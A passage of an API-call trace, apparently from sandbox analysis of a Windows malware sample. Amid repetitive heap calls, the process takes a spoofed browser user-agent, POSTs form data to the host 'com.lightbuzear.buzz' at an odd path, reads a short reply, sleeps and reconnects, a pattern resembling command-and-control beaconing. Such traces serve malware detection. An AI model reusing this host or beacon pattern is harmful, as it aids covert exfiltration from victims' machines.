returned 0xcc0008 [0177.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09b0 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f09b0 [0177.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f1a0 [0177.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f1a0 | out: hHeap=0x4780000) returned 1 [0177.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f330 [0177.835] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481efe8 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0177.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0177.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0177.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0177.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0177.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0a58 [0177.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0177.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0177.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0177.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f09c8 [0177.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f2b8 [0177.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f2b8 | out: hHeap=0x4780000) returned 1 [0177.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0177.836] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0177.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0177.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b48 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f240 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0177.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f240 | out: hHeap=0x4780000) returned 1 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f1c8 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0177.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f290 [0177.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0177.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0177.838] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0177.838] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f290 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b78 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0ba8 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b78 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ba8 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3d0 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0177.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0177.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f420 [0177.849] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0177.849] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f2b8 [0177.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0177.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0177.850] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0177.850] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0180.004] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f2b8 | out: hHeap=0x4780000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0180.005] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0180.005] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0180.005] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0180.005] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0180.005] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0bc0 [0180.005] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b48 [0180.005] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0180.006] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f038 [0180.006] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0180.006] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f038 | out: hHeap=0x4780000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f038 [0180.006] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0180.006] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f128 [0180.006] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0180.007] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0180.007] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0180.007] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0180.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f128 | out: hHeap=0x4780000) returned 1 [0180.008] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0180.008] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0bc0 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0ba8 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ba8 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f218 [0180.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0180.010] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f218 | out: hHeap=0x4780000) returned 1 [0180.010] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f218 [0180.010] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0180.010] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f448 [0180.010] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0180.010] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0180.011] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0180.011] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0180.012] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f448 | out: hHeap=0x4780000) returned 1 [0180.012] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0180.013] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0180.013] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0180.013] FreeLibrary (hLibModule=0x71570000) returned 1 [0180.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0180.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0180.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481efe8 | out: hHeap=0x4780000) returned 1 [0180.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f330 | out: hHeap=0x4780000) returned 1 [0180.014] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6f0 | out: hHeap=0x4780000) returned 1 [0180.014] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0180.014] Sleep (dwMilliseconds=0x2710) [0180.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0180.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0180.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0180.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0180.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0180.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0180.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0180.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0180.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0180.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0a58 [0180.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0180.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09e0 [0180.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0180.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0180.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09e0 | out: hHeap=0x4780000) returned 1 [0180.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0ae8 [0180.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0180.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0180.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0180.072] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0180.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0180.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0180.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0180.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09e0 [0180.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09f8 [0180.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09e0 | out: hHeap=0x4780000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0180.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09f8 | out: hHeap=0x4780000) returned 1 [0180.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f6f0 [0180.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0180.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0180.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6f0 | out: hHeap=0x4780000) returned 1 [0180.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6f0 [0180.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0180.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f358 [0180.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0180.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0180.074] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0180.074] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0180.074] FreeLibrary (hLibModule=0x71780000) returned 1 [0180.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f358 | out: hHeap=0x4780000) returned 1 [0180.074] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f470 [0180.075] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0180.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0180.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0180.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0180.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09f8 [0180.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0a58 [0180.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09f8 | out: hHeap=0x4780000) returned 1 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0180.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f09f8 [0180.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f0b0 [0180.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f0b0 | out: hHeap=0x4780000) returned 1 [0180.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0180.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f0b0 [0180.076] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0180.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f0d8 [0180.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0180.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0180.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 